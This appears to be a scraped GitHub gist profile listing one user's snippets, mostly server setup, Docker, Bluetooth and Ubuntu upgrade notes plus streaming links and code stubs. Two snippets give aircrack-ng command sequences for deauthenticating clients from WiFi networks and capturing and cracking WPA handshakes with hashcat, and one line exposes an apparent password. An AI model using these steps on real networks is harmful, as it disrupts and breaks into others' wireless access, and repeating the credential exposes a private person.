Skip to content

Instantly share code, notes, and snippets.

View DastanIqbal's full-sized avatar
🎯
Focusing

Iqbal Ahmed DastanIqbal

🎯
Focusing
View GitHub Profile
sudo add-apt-repository universe
sudo apt install nginx php7.2 php7.2-fpm git software-properties-common php7.2-mbstring php7.2-xml composer unzip composer
## Optional PHP Plugins
sudo apt install memcached php-memcache php-pear php-imagick php7.2-cgi php7.2-mysql php7.2-curl php7.2-gd php7.2-imap php7.2-tidy php7.2-xmlrpc php7.2-xsl php7.2-mbstring php7.2-zip php7.2-cli
git clone https://github.com/org/project.git #replace url
# Setup Nginx
nano /etc/nginx/sites-available/<domainname>
Openresty by Like App
http://video.like.video/asia_live/hkg5/M0B/39/3C/IYAwAFqGr_2EZR-qAAAAAIjeaY4298.mp4?crc=3072097690&type=0&i=03f15680016156a33c6c&crc2=715482659&crc8=316836545&crc16=1964104482@AQAAAPKowVvKhIv5c4P84xRnvqDJbXORzf9lHS+mmgDUavXngq73pFZirbmviGG3
https://backendless.com/products/media-streaming/
https://www.contus.com/video-on-demand-solution.php
https://www.vdocipher.com/
https://www.wowza.com/solutions/powered-by-wowza/mobile-live-streaming-app-guide
https://livestream.com/developers
#kickYou
airmon-ng check kill
airmon-ng start wlan0
airodump-ng --bssid <bssid> wlan0
aireplay-ng --deauth 0 -a (networks bssid) -k (ip address)
aireplay-ng --deauth 0 -a (networks bssid) -c (mac address)
How to upgrade from 15.04 to 15.10
Check package avaliablity
http://old-releases.ubuntu.com/ubuntu/dists/
Try this first:
http://changelogs.ubuntu.com/meta-release
https://help.ubuntu.com/community/EOLUpgrades
then fire
sudo apt-get upgrade
Openresty by Like App
http://video.like.video/asia_live/hkg5/M0B/39/3C/IYAwAFqGr_2EZR-qAAAAAIjeaY4298.mp4?crc=3072097690&type=0&i=03f15680016156a33c6c&crc2=715482659&crc8=316836545&crc16=1964104482@AQAAAPKowVvKhIv5c4P84xRnvqDJbXORzf9lHS+mmgDUavXngq73pFZirbmviGG3
https://backendless.com/products/media-streaming/
https://www.contus.com/video-on-demand-solution.php
https://www.vdocipher.com/
https://www.wowza.com/solutions/powered-by-wowza/mobile-live-streaming-app-guide
https://livestream.com/developers
password:Khush:0134308553
ifconfig wlan0 down
aireplay-ng -9 wlan0 ----------> Tell wifi is capable for injection or not
Deauthentication-> aireplay-ng -0 30(send 30 deauth request for unlimmitted 0) -a bssid -c macIdtoDeauth wlan0
airodump-ng -c <channelNo> --bssid <mac router> -w psk wlan0
aircrack-ng -J mypsk psk-01.cap ---> converting to hccap (Hashcat)
hashcat -m(mode) 2500 mypsk.hccap megabeast.txt(worldlist)
create Pasword
@DastanIqbal
DastanIqbal / RenameFolders.py
Created July 2, 2019 08:44
Rename current directory folders
#!/usr/bin/python3
import os
cwd = os.getcwd()
dirs = os.listdir(cwd)
dirs.sort()
i = 0
for dir in dirs:
if os.path.isdir(dir):
@DastanIqbal
DastanIqbal / ZoomLayout.java
Created December 19, 2018 04:46
Zoom In,Zoom Out,Drag child views and Drag parent view
package com.dastanapps.testcode;
/**
*
* Source: https://gist.github.com/cami7ord/0ce6f36a28d36bf17d96284f2cf75ae9
* Added Drag features for parent view
*
*/
import android.annotation.SuppressLint;
import android.content.Context;
##https://www.digitalocean.com/community/tutorials/how-to-install-and-use-docker-on-ubuntu-16-04
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
sudo apt-get update
#apt-cache policy docker-ce
sudo apt-get install -y docker-ce
#sudo systemctl status docker //check docker status
sudo usermod -aG docker ${USER}
su - ${USER}
sudo add-apt-repository ppa:bluetooth/bluez
sudo apt-get update
sudo apt upgrade
sudo apt install pulseaudio pulseaudio-utils pavucontrol pulseaudio-module-bluetooth
sudo service bluetooth restart